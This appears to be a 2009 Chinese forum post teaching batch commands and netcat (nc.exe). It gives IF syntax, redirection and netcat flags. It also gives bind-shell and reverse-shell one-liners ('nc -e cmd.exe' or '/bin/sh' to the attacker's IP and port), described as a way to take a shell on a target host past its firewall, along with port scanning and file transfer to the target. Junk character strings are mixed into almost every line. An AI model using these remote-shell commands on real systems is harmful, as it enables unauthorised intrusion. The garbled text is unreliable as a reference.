TA的每日心情 | 开心 2014-7-28 21:47 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
7楼
楼主 |
发表于 2009-5-4 09:36:48
|
只看该作者
七:
! ^# }! P, Y- g( D2:if命令及变量 基本格式:
1 |9 K8 [; b8 \4 \3 i6 EIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。5 m2 O5 m, w& W; [3 O
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。6 @4 K! Y, K' G2 p8 j
0 指发现并成功执行(真);1 指没有发现、没执行(假)。
6 t( B+ B( g( p8 C9 C0 i1 HIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
" r8 _7 u8 q) Z7 v/ U) b( B例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
' Y" b, b$ `+ {* QIF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。 ]+ ^4 o5 e3 B$ d5 g! Z
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。) v) W) v1 L6 C2 L; ]& @
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”5 C# b" W: G7 |* W7 ~
(二)系统外部命令(均需下载相关工具):
; Z. R, n# w4 u+ V6 Q# y1 u1 V* i1、瑞士军刀:nc.exe) a- _& G* |# H X' y7 e4 ?
参数说明:$ ~! }+ i0 y* l
-h 查看帮助信息" J l( W8 Q5 m4 B( C6 R
-d 后台模式
3 r; t7 }" ^8 g-e prog程序重定向,一但连接就执行[危险]
1 t+ l1 Z1 f4 d( Y- F1 m-i secs延时的间隔
2 E1 A8 _ F2 H-l 监听模式,用于入站连接: D" j+ `: ?8 \! F+ X/ ^
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C J L, ?7 w' X1 M' G7 ?/ S$ j; J
-n IP地址,不能用域名) e! T( z( B: S5 p$ ~) S
-o film记录16进制的传输- x: {! G2 y A8 a. `
-p[空格]端口 本地端口号
; |2 J/ x. l8 o-r 随机本地及远程端口. U9 _1 g2 J5 p5 C' l) f2 i
-t 使用Telnet交互方式" _: f8 Z7 t; z, P' a Q
-u UDP模式( g4 Q3 f2 t, s5 y
-v 详细输出,用-vv将更详细
# A3 U9 k5 W6 p; g, @-w数字 timeout延时间隔5 @4 ]& N D7 F0 k6 x/ R) y+ ?
-z 将输入,输出关掉(用于扫锚时)
& _ {; f) `& p, O基本用法:2 d3 T' M1 z# s$ w% ]; N8 N( n, C
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
5 \! b2 m1 C$ U" t" Jnc -l -p 80 开启本机的TCP 80端口并监听
: Y$ y) F. \, e" c9 M+ Tnc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
* O+ H2 u- F; y0 Lnc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
0 N1 ?# t% b; Cnc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
9 Z- S3 _) d4 ~( w' }; z1 f. j高级用法:4 C4 h2 X, [2 C4 g/ a7 K4 X$ W
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止4 X0 k1 e+ V! }" [3 _
nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
. d# l6 Z7 S. k' Q$ h( vnc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
: r, Z# W- g# ~type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
; O* V2 t( N3 p3 J- O本机上用:nc -l -p 本机端口) u& e* V0 J7 Q$ L. a6 m5 ~
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
0 L7 x8 r1 ~! g8 Y! H% Xnc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙1 f1 B) | `9 A6 n
本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称* O- W7 S; g/ ^6 h
在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
% c) C: H7 o! ]. T备 注:
4 v6 [3 D/ B# `( u| 管道命令$ d- {. [2 ~. c+ S# \7 d7 c3 [
< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
, w5 _8 a5 C; U- i* e@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中2 f" m" B0 m( e) V# ?& v7 T, w# K! E; {
>与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。0 b% o- M* w' p3 m1 i' L
如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。7 q# \9 {. W, c; s
|
|